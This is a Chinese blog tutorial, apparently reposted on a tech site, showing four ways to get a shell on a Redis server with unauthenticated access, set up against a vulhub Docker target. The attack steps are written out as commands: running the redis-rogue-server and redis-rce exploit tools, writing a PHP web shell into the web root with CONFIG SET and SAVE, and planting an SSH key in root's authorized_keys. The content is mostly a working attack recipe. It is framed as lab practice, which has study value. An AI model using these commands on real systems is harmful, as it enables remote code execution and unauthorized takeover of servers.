当前位置: 首页 > backend >正文

redis得到shell的几种方法

 getshell(一)(上文)

docker演示

进入vulhub目录使用以下命令启动靶机

cd /vulhub-master/redis/4-unacc

docker-compose up -d

docker ps

kali中

安装redis

apt-get install redis

连接,ip换为docker容器ip地址

redis-cli -h 39.105.47.83 -p 6379

直接连接执行命令且不需要认证说明存在未授权访问漏洞

下载以下攻击项目

https://github.com/n0b0dyCN/redis-rogue-server

下载完成后解压

在项目目录下执行以下命令

python3 redis-rogue-server.py --rhost 39.105.47.83 --lhost 39.105.47.83

若执行错误,再次执行一下就行

输入i就可以进入shell

安装redis

建议在contos上安装,命令相同,下面只是演示      kali做攻击机

wget https://download.redis.io/releases/redis-4.0.9.tar.gz

tar zxvf redis-4.0.9.tar.gz

移动一下安装地点

mv redis-4.0.9 /usr/local/redis

make

make install

vim redis.conf

getshell(二)

需要有网站建立才能成功

在kali上输入

redis-cli -h 192.168.219.128 -p 6379

连接成功后,输入

CONFIG SET dir /var/www/html               修改存储路径为Web目录
CONFIG SET dbfilename shell.php               设置文件名为shell.php

SET shell "<?php system($_GET['cmd']);?>"          保存木马

save

蚁剑连接或直接网址访问

http://ip/shell.php

http://ip/shell.php?cmd=whoami

getshell(三)

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
git clone https://github.com/Ridter/redis-rce.git

下载完成后进入RedisModules-ExecuteCommand目录输入make

会生成moudle.so 文件

然后把生成的moudle.so复制到redis-rce目录里面

进入 redis-rce目录里面终端输入

python redis-rce.py -r 192.168.111.132 -p 6379 -L 192.168.111.130 -f moudle.so

getshell(四)

公钥

ssh-keygen -t rsa  # 默认保存到~/.ssh/id_rsa.pub

(echo -e "\n";cat /root/.ssh/id_rsa.pub;echo -e "\n")>1.txt          记得修改为自己的密钥地址

输入
cat 1.txt |redis-cli -h 192.168.111.130 -x set crack

连接成功后在输入

config set dir /root/.ssh
config set dbfilename authorized_keys
save

使用ssh登录就可以了

http://www.xdnf.cn/news/16535.html

相关文章:

  • 如何使用Spring AI框架开发mcp接口并发布成微服务
  • 31.【.NET8 实战--孢子记账--从单体到微服务--转向微服务】--单体转微服务--财务服务--收支分类
  • 解决IDEA拉取GitLab项目报错:必须为访问令牌授予作用域[api, read user]
  • 日语学习-日语知识点小记-构建基础-JLPT-N3阶段(11):文法+单词
  • tcp通讯学习数据传输
  • 【NLP舆情分析】基于python微博舆情分析可视化系统(flask+pandas+echarts) 视频教程 - 微博文章数据可视化分析-文章评论量分析实现
  • Web3 网络安全漏洞的预防措施
  • 面向对象系统的单元测试层次
  • 算法思维进阶 力扣 375.猜数字大小 II 暴力递归 记忆化搜索 DFS C++详细算法解析 每日一题
  • K8s集群两者不同的对外暴露服务的方式
  • React--》实现 PDF 文件的预览操作
  • [2025CVPR-图象分类]ProAPO:视觉分类的渐进式自动提示优化
  • ubuntu22.04 安装 petalinux 2021.1
  • B+树高效实现与优化技巧
  • 微信小程序私密消息
  • 聚铭安全管家平台2.0实战解码 | 安服篇(三):配置保障 自动核查
  • yolov11的简单实例
  • 【密码学】4. 分组密码
  • 关闭 UniGetUI 自动 Pip 更新,有效避免 Anaconda 环境冲突教程
  • Python Pandas.merge函数解析与实战教程
  • 软件测试之功能测试
  • Ubuntu系统完整配置教程
  • unbuntn 22.04 coreutils文件系统故障
  • RabbitMQ快速入门
  • 基于FPGA和DDS原理的任意波形发生器(含仿真)
  • 【Unity】Application类常见路径一览表
  • 基于LangGraph Cli的智能数据分析助手
  • 主要分布于内侧内嗅皮层的层Ⅲ的网格-速度联合细胞(Grid × Speed Conjunctive Cells)对NLP中的深层语义分析的积极影响和启示
  • OpenCV(05)直方图均衡化,模板匹配,霍夫变换,图像亮度变换,形态学变换
  • nvim cspell